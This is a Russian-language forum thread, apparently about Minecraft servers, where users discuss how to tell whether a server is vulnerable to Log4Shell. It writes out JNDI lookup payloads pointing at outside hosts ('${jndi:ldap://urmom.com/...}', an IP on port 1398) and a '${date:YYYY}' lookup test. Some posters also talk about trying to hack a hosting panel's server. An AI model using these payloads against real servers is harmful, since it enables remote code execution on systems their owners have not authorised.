Уязвимость Log4j как узнать что сервер уязвим?

nilas

Заблокирован
Сообщения
208
каким образом проверить что могут взломать сервер?
или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?
 
Придется открывать IP на компудахтере, что логично хреновый вариант
Объединено


IP бл... порты!
ну зачем мне ломать свой пк? я не понимаю этого
что за запутанность то такая?
разве не тупо вводишь в консоль сервера(который на хостинге) например:say ${sh start.sh) то начинается исполняться скрипт на панельном хосте.
 
ну зачем мне ломать свой пк? я не понимаю этого
Да какой свой господе! Ну чего не понятного.
${jndi:ldap://urmom.com/log4jtobipizda} = "Привет сервер, выполни код по ссылке urmom.com/log4jtobipizda"
 
Да какой свой господе! Ну чего не понятного.
${jndi:ldap/urmom.com/log4jtobipizda} = "Привет сервер, выполни код по ссылке urmom.com/log4jtobipizda"
${jndi:ldap://.ip компа:1398/Log4JCE} обращается к компу на котором сервер Log4JCE? тогда почему на видео ломают свой пк а не сервер?
 
тогда почему на видео ломают свой пк а не сервер?
Может по тому что твой майнкрафт использует тот же log4j2 ля логгирования и у него есть такая же уязвимость?
 
Может по тому что твой майнкрафт использует тот же log4j2 ля логгирования и у него есть такая же уязвимость?
получается работает так:Сервер начинает подключаться к пк,на пк спец программа работает на спец порту, сервер подключился к пк в котором спец код,сервер начинается его исполнять... так?
 
:Сервер начинает подключаться к пк,на пк спец программа работает на спец порту, сервер подключился к пк в котором спец код,сервер начинается его исполнять... так?
Ну если мы думаем одинаково то да
 
это потому что сервер на их пк работал?
Это по тому что майнкрафт использует ту же систему логгирования что и сервера.
Объединено

Кароче мы отклонились от темы. Суть проста. Лукапы. /say ${date:YYYY} - лукап. Если лукап работает, т.е. дата выбивается - сервер с вероятностью 90% подвержен взлому.
 
Это по тому что майнкрафт использует ту же систему логгирования что и сервера.
Объединено

Кароче мы отклонились от темы. Суть проста. Лукапы. /say ${date:YYYY} - лукап. Если лукап работает, т.е. дата выбивается - сервер с вероятностью 90% подвержен взлому.
Дата выбивалась,буду проверять получится ли ломануть.
 
Так что не взломать SSH у панельного хоста.
О чем ты думал, если у тебя юзер у которого ни на что нет прав?
Объединено

При помощи log4shell ты можешь сделать что-то реальное только если сервер запущен от рута или юзера с реальными правами. Если у тебя тупо хост, у которого более чем на запуск сервера ни на что прав нет, то ты ничего не сделаешь.
Если бы так было можно, удалить все сервера можно было бы при помощи обычного плагина и кода Runtime.getRuntime().exec()
 
Последнее редактирование:
О чем ты думал, если у тебя юзер у которого ни на что нет прав?
Объединено

При помощи log4shell ты можешь сделать что-то реальное только если сервер запущен от рута или юзера с реальными правами. Если у тебя тупо хост, у которого более чем на запуск сервера ни на что прав нет, то ты ничего не сделаешь.
Если бы так было можно, удалить все сервера можно было бы при помощи обычного плагина и кода Runtime.getRuntime().exec()
мб код не правильный? вбивал в Log4jRCE.java такой код:
 
Назад
Сверху Снизу